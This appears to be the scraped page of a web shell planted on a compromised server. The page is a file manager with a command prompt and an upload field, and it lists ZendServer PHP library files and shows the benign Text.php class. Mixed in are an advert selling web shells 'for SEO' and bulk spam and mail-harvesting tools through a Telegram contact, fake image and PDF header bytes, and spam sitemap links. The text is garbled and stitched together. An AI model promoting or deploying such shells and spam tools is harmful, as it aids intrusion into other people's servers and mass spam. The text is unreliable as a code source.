xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer;

class Text
{
    /**
     * Pattern of the string
     * @var string
     */
    private $message;

    /**
     * An array of arguments to fill in the pattern
     * @var array
     */
    private $arguments;

    /**
     * @param Zwas_Text | string $message String of text where '?' mark is a place holder for the following arguments
     * @param array $arguments Array of arguments that should be placed in the provided string, replacing the '?' mark (same order)
     */
    public function __construct($message, $arguments = array())
    {
        $this->message   = $message;
        $this->arguments = $arguments;
    }

    /**
     * Returns the message string
     * @return string
     */
    public function getMessage()
    {
        return $this->message;
    }

    /**
     * Returns the message arguments
     * @return array
     */
    public function getArguments()
    {
        return $this->arguments;
    }

    /**
     * Convert message to the string  - replace all arguments in message
     *
     * @return string
     */
    public function __toString()
    {
        $arguments = $this->getArguments();

        $msg = $this->getMessage();

        if (count($arguments)) {
            // in order to avoid strings having other flags which may match the vprintf
            // such as %d or %3C which in encoded URL is <
            $msg = strtr($msg, array('%%s' => '%%s', '%s' => '%s', '%' => '%%'));
        }

        // Handle the case when there are too few arguments passed, in which case vprintf will fail
        $string = vsprintf($msg, $arguments);
        return (false === $string) ? '' : $string;
    }
}

Filemanager

Name Type Size Permission Actions
Authentication Folder 0755
Configuration Folder 0755
Container Folder 0755
Db Folder 0755
FS Folder 0755
Filter Folder 0755
Form Folder 0755
Http Folder 0755
Ini Folder 0755
Log Folder 0755
Mvc Folder 0755
Navigation Folder 0755
PHPUnit Folder 0755
Permissions Folder 0755
Translator Folder 0755
Utils Folder 0755
Validator Folder 0755
View Folder 0755
Collection.php File 2 KB 0644
Edition.php File 1.95 KB 0644
EditionAwareInterface.php File 155 B 0644
Exception.php File 392 B 0644
Set.php File 2.87 KB 0644
Text.php File 1.64 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml